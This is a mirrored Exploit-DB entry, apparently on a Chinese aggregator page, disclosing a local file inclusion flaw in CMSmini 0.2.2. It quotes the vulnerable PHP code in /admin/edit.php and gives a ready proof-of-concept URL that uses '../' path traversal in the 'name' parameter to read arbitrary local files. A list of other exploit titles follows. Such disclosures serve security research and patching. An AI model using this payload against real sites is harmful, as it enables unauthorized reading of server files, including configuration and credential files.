CMS mini 0.2.2 – Local File Inclusion

Exploit Database
21 阅读

作者： BeopSeong/I2Sec

日期： 2011-10-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18001/

# Exploit Title: [CMSmini 0.2.2 Local File Inclusion]
# Date: [2011.10.20]
# Author: [I2Sec5-BSK]
# Software Link: [http://sourceforge.net/projects/cmsmini/]
# Version: [CMSmini 0.2.2]
# Tested on: [Windows XP]

--------------------------------------------------

/admin/edit.php

30 $name = $_GET['name'];
73 $filename = $dirpath.'/'.$name;
74 $fh = fopen($filename, 'r');
75 $data = fread($fh, filesize($filename));
76 fclose($fh);
77 echo $data;

---------------------------------------------------

POC : http://[ Address ]/admin/edit.php?name=../../../../../../../../../../../../[ Local File ]

last Exploits
CMS mini 0.2.2 – Local File Inclusion的更多信息

Ceica-GW – ‘login.php’ Cross-Site Scripting：
ZKTeco ZKBioSecurity 3.0 – ‘visLogin.jsp’ Local Authentication Bypass：
Sophos Web Appliance 4.2.1.3 – DiagnosticTools Remote Command Injection (Metasploit)：
Digi Online Examination System 2.0 – Unrestricted Arbitrary File Upload：
NetOffice Dwins 1.4p3 – SQL Injection：
Marinet CMS – SQL Injection：
KodExplorer 4.49 – CSRF to Arbitrary File Upload：
SISQUALWFM 7.1.319.103 – Host Header Injection：